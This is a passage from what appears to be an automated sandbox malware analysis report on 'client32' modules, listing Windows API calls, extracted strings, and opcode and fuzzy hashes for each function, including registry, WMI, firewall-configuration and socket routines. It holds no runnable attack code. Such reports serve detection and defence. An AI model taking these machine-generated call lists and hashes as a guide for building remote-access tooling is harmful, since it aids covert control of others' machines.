                                                                                                                                        • Opcode Fuzzy Hash: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
                                                                                                                                        • Instruction Fuzzy Hash: 9811947AF0022767D2116FB06C89B6FBA18AF8561DF104038FA1B85581EF24A94483F3
                                                                                                                                        APIs
                                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115ABA8
                                                                                                                                        • GetLastError.KERNEL32 ref: 1115ABB5
                                                                                                                                        • wsprintfA.USER32 ref: 1115ABC8
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                          • Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115AC0C
                                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115AC19
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                                                        • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                                                        • API String ID: 1734919802-1728070458
                                                                                                                                        • Opcode ID: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
                                                                                                                                        • Instruction ID: 447bd79fb7e316194c8fbcf3240c79f01d8f25fe8b238cd57140670aacafd43f
                                                                                                                                        • Opcode Fuzzy Hash: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
                                                                                                                                        • Instruction Fuzzy Hash: 7811C475D01319AFC720EFFA9DC09AAF7B8FF01319B40462EE56653540EA7095408B5A
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                        • std::exception::exception.LIBCMT ref: 1110D0CA
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 1110D0DF
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 1110D0F6
                                                                                                                                        • InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000003EC), ref: 1110D109
                                                                                                                                        • InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000003EC), ref: 1110D118
                                                                                                                                        • EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152
                                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D1DF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                                        • API String ID: 144328431-1024648535
                                                                                                                                        • Opcode ID: ec2df561275c0d64ba6d257a16c8b5c35912085c7d85a207c9b9c2d87efd88b9
                                                                                                                                        • Instruction ID: 09a7b7f2a39b786243c3074fc4a04aff0e2c3ee4e0c0e7a142bf3ec4b628a9f7
                                                                                                                                        • Opcode Fuzzy Hash: ec2df561275c0d64ba6d257a16c8b5c35912085c7d85a207c9b9c2d87efd88b9
                                                                                                                                        • Instruction Fuzzy Hash: F941C075E01315ABDB12CFA98D84BAEFBE4FB88718F54852AE819D3244E731A5008B51
                                                                                                                                        APIs
                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,A0A8B03E,?,00000000,00000001), ref: 11158267
                                                                                                                                        • CoCreateInstance.OLE32(111C06FC,00000000,00000017,111C062C,?), ref: 11158287
                                                                                                                                        • wsprintfW.USER32 ref: 111582A7
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 111582B3
                                                                                                                                        • wsprintfW.USER32 ref: 11158367
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 11158408
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                                        • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                                        • API String ID: 3050498177-823534439
                                                                                                                                        • Opcode ID: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
                                                                                                                                        • Instruction ID: 5c9d69ea3c7034288904af0a1b42e56c7497ab7ebaebdabd712d66f14354dd8e
                                                                                                                                        • Opcode Fuzzy Hash: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
                                                                                                                                        • Instruction Fuzzy Hash: 3A517071B00219AFD7A0DB69CC94F9BF7B9FB8A714F1042A9E819D7251D630AE40CF51
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 11112B55
                                                                                                                                        • CoCreateInstance.OLE32(111BBF3C,00000000,00000001,111BBF4C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104B1EB), ref: 11112B6F
                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11112B94
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11112BA6
                                                                                                                                        • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11112BB9
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11112BC5
                                                                                                                                        • CoUninitialize.COMBASE(00000000), ref: 11112C61
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                                                        • String ID: SHELL32.DLL$SHGetSettings
                                                                                                                                        • API String ID: 4195908086-2348320231
                                                                                                                                        • Opcode ID: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
                                                                                                                                        • Instruction ID: 68fa62bcea783be6e527966318309be417962e86cfe8c7ca8d2a125abe7bdbbc
                                                                                                                                        • Opcode Fuzzy Hash: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
                                                                                                                                        • Instruction Fuzzy Hash: 00515DB5A002169FDB04DFE5C9C4AEFFBB9FF88304F218569E615AB244D730A941CB61
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,68910F2B,27CEFB69,00000000,?,?,6892F278,000000FF,?,688FAE0A,?,00000000,?,00000080), ref: 68910D48
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 68910D5B
                                                                                                                                        • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6893CB4C,?,?,6892F278,000000FF,?,688FAE0A,?,00000000,?,00000080), ref: 68910D76
                                                                                                                                        • _malloc.LIBCMT ref: 68910D8C
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6892F278,000000FF,?,688FAE0A,?,00000000,?), ref: 68910D9F
                                                                                                                                        • _free.LIBCMT ref: 68910D84
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 68910DAF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                                                        • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                                                        • API String ID: 1360380336-1843585929
                                                                                                                                        • Opcode ID: 2d4c7f6d322f0a75955036bd77a51e6c2c05dd951f481ddc2939768623976686
                                                                                                                                        • Instruction ID: d412b9cd18be6b116ed19d84f13527f4d732333928a915bd3d159bd059510119
                                                                                                                                        • Opcode Fuzzy Hash: 2d4c7f6d322f0a75955036bd77a51e6c2c05dd951f481ddc2939768623976686
                                                                                                                                        • Instruction Fuzzy Hash: 3901F7B96483157BE7308B709C85F6B77ACAB92B04F50481CF5A69F680EA72F440C720
                                                                                                                                        APIs
                                                                                                                                        • _memmove.LIBCMT ref: 1105F71D
                                                                                                                                        • _free.LIBCMT ref: 1105F770
                                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                        • _free.LIBCMT ref: 1105F78C
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 1105F7C0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$CriticalErrorFreeHeapLastLeaveSection_memmove
                                                                                                                                        • String ID: (NULL)$..\ctl32\Config.cpp$Send EV_CONFIGSET from %s@%d$cfg %x: Set [%s]%s=%s
                                                                                                                                        • API String ID: 4241856912-972392202
                                                                                                                                        • Opcode ID: 8b78972ff2ef7c4f36a2d7af3afaaec90c158693732ee178fb62e3972c1b702c
                                                                                                                                        • Instruction ID: 3bbb31bc911666711c2868e8336f915e83d4f5198759807ff36000dcfaec8d7f
                                                                                                                                        • Opcode Fuzzy Hash: 8b78972ff2ef7c4f36a2d7af3afaaec90c158693732ee178fb62e3972c1b702c
                                                                                                                                        • Instruction Fuzzy Hash: EC3173B6E00219ABDB95DB64CC40BAEF7BCBB44708F0441DDE519A7240EB346B84CF62
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 111419A0: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
                                                                                                                                          • Part of subcall function 111419A0: RegCloseKey.ADVAPI32(?), ref: 11141A74
                                                                                                                                        • _memset.LIBCMT ref: 11141AF5
                                                                                                                                        • GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                        • GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                                                        • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                        • API String ID: 4251163631-545709139
                                                                                                                                        • Opcode ID: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
                                                                                                                                        • Instruction ID: b52f9434772b6d6e8d8038633bf4c77d33c7f8479cfcef56ad60021fb0ce4fde
                                                                                                                                        • Opcode Fuzzy Hash: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
                                                                                                                                        • Instruction Fuzzy Hash: BE31E331F006268BD7119FB5C984BAEF7B0EB05718FA04575E928C3680E7346985CB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,?), ref: 1105FEAB
                                                                                                                                        • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?), ref: 1105FF12
                                                                                                                                        • _free.LIBCMT ref: 1105FF24
                                                                                                                                          • Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumExitProcessValue$ErrorLastMessage_free_strrchrwsprintf
                                                                                                                                        • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                                                                        • API String ID: 809228333-161875503
                                                                                                                                        • Opcode ID: 20ed8e4f7a127c419030e1fad9ffb5210fd9748ab01ce83f3fe573825fb9846c
                                                                                                                                        • Instruction ID: 68c01e32377f0c834a65899b8bd60ce0b3952d100fbeb1b2b0cb0160ae45c03f
                                                                                                                                        • Opcode Fuzzy Hash: 20ed8e4f7a127c419030e1fad9ffb5210fd9748ab01ce83f3fe573825fb9846c
                                                                                                                                        • Instruction Fuzzy Hash: 1081F075A007469FE761CF64C880BABBBF8BF05708F044A1CE58A97681E770B549CBA1
                                                                                                                                        APIs
                                                                                                                                        • wsprintfA.USER32 ref: 110152AA
                                                                                                                                        • _memset.LIBCMT ref: 110152EE
                                                                                                                                        • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015328
                                                                                                                                        Strings
                                                                                                                                        • NSLSP, xrefs: 11015338
                                                                                                                                        • %012d, xrefs: 110152A4
                                                                                                                                        • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101522B
                                                                                                                                        • PackedCatalogItem, xrefs: 11015312
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue_memsetwsprintf
                                                                                                                                        • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                                        • API String ID: 1333399081-1346142259
                                                                                                                                        • Opcode ID: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
                                                                                                                                        • Instruction ID: 40dd4717f0c7ad5754e433c7b85868c8d74bcde588045e86a78ebe46af68b9ce
                                                                                                                                        • Opcode Fuzzy Hash: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
                                                                                                                                        • Instruction Fuzzy Hash: 01418F75D022299EEB11DF50CC94BEEF7B4EB45318F0445E8E91AA7281EB34AB44CF51
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CheckCountLicenseStringTick_fgets_strpbrkwsprintf
                                                                                                                                        • String ID: _License
                                                                                                                                        • API String ID: 2925274595-3969723640
                                                                                                                                        • Opcode ID: 57eb07912173b09d2d6a718f612a6a8b2fea9b3332f7ae0c9a2918cf08a18aab
                                                                                                                                        • Instruction ID: 96a77fb98c0223eb2b4e36b27f4c2e587a44f0df050ee6f7a48cce7550f15376
                                                                                                                                        • Opcode Fuzzy Hash: 57eb07912173b09d2d6a718f612a6a8b2fea9b3332f7ae0c9a2918cf08a18aab
                                                                                                                                        • Instruction Fuzzy Hash: 7341E275C0465A9FDB11CF648C40BEABBFDAF49349F0481D5E889E3241E732AA46CF60
                                                                                                                                        APIs
                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FFBD
                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FFE0
                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 11010064
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 11010072
                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 11010085
                                                                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101009F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                        • String ID: bad cast
                                                                                                                                        • API String ID: 2427920155-3145022300
                                                                                                                                        • Opcode ID: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
                                                                                                                                        • Instruction ID: eb2297de3126562b7a6adfe99aab1db74979c6a8f9cac3cb144437a799ef2362
                                                                                                                                        • Opcode Fuzzy Hash: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
                                                                                                                                        • Instruction Fuzzy Hash: B631E635E002658FCB52CF94C880BAEF7B4FB0536CF404269E865AB298DB75AD00CB91
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountTick
                                                                                                                                        • String ID: 2e$AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                                                        • API String ID: 536389180-1865515207
                                                                                                                                        • Opcode ID: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
                                                                                                                                        • Instruction ID: e3d06188695ac204c7c53c5cb05177b21b7d5d04c4fed9e193d22ae282c8029d
                                                                                                                                        • Opcode Fuzzy Hash: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
                                                                                                                                        • Instruction Fuzzy Hash: D021E770A213A64EFF938AE5DD84765FE895780FAEF004139D420956CCE7749480DF56
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                                                        • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                                        • API String ID: 3494822531-1878648853
                                                                                                                                        • Opcode ID: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
                                                                                                                                        • Instruction ID: 9db0ad8c4734361e4183e08fa1cc534476f5972450c8a9aa7511e5a375f2920b
                                                                                                                                        • Opcode Fuzzy Hash: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
                                                                                                                                        • Instruction Fuzzy Hash: 42515975E0422E5BDB12CF248C54BDDF7A4AB05B18F2441E4EC89B7681EB717A84CB92
                                                                                                                                        APIs
                                                                                                                                        • _calloc.LIBCMT ref: 68902FBB
                                                                                                                                        • GetTickCount.KERNEL32 ref: 6890300D
                                                                                                                                        • InterlockedExchange.KERNEL32(-00039761,00000000), ref: 6890301B
                                                                                                                                        • _calloc.LIBCMT ref: 6890303B
                                                                                                                                        • _memmove.LIBCMT ref: 68903049
                                                                                                                                        • InterlockedDecrement.KERNEL32(-000397B9), ref: 6890307F
                                                                                                                                        • SetEvent.KERNEL32(00000314,?,?,?,?,?,?,?,?,?,?,?,?,?,?,976C34B3), ref: 6890308C
                                                                                                                                          • Part of subcall function 689028D0: wsprintfA.USER32 ref: 68902965
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3178096747-0
                                                                                                                                        • Opcode ID: 1d94af034196da9a62ac61e2d4a6684a7ca5dd1710d1ab6d632a3215531c8c3d
                                                                                                                                        • Instruction ID: 53f9dfc601b75b829bebd5ff14eaf99743127fdf37a03546a1e79fef0b6be0c7
                                                                                                                                        • Opcode Fuzzy Hash: 1d94af034196da9a62ac61e2d4a6684a7ca5dd1710d1ab6d632a3215531c8c3d
                                                                                                                                        • Instruction Fuzzy Hash: 414162B6C04209AFDB10CFB9C844AEFB7F8EB48304F50852AE51AE7240E775D645CBA0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
                                                                                                                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
                                                                                                                                        • std::exception::exception.LIBCMT ref: 11104424
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 11104439
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad$CreateEventException@8Throw_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                                                                        • API String ID: 1187064156-2390547818
                                                                                                                                        • Opcode ID: 0e7ad8b693c498ee1e4a6f1cf957980c85518d600d03c49e45930bbad189b04a
                                                                                                                                        • Instruction ID: bbbd634f828a37cff571ede067cab351b0e944a9bc0c67eb03fa8c0f48524c6c
                                                                                                                                        • Opcode Fuzzy Hash: 0e7ad8b693c498ee1e4a6f1cf957980c85518d600d03c49e45930bbad189b04a
                                                                                                                                        • Instruction Fuzzy Hash: 594114B5D09B449AC361CF6A8980BDAFBF8EFA9204F00494ED5AE93210D7787500CF51
                                                                                                                                        APIs
                                                                                                                                        • send.WSOCK32(?,?,?,00000000), ref: 688F9C93
                                                                                                                                        • timeGetTime.WINMM(?,?,?,00000000), ref: 688F9CD0
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 688F9CDE
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 688F9D4F
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 688F9D72
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                                                                        • String ID: 3'
                                                                                                                                        • API String ID: 77915721-280543908
                                                                                                                                        • Opcode ID: 0d45d342e29d838e7f1df81194fa492885af46f0fc0cfee9ab91cad5a4575f1b
                                                                                                                                        • Instruction ID: 8570e28b67e5a80d3149675f7176c5ba621eab35fd64203b9248dd01ad8488d8
                                                                                                                                        • Opcode Fuzzy Hash: 0d45d342e29d838e7f1df81194fa492885af46f0fc0cfee9ab91cad5a4575f1b
                                                                                                                                        • Instruction Fuzzy Hash: B121AE75A081188FDB20DF68CC88B9AB3B4AF05364F5146E5D81D9B282CB34ED86CF91
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,GetProcessImageFileNameA), ref: 110259F6
                                                                                                                                        • K32GetProcessImageFileNameA.KERNEL32(?,?,?), ref: 11025A12
                                                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025A26
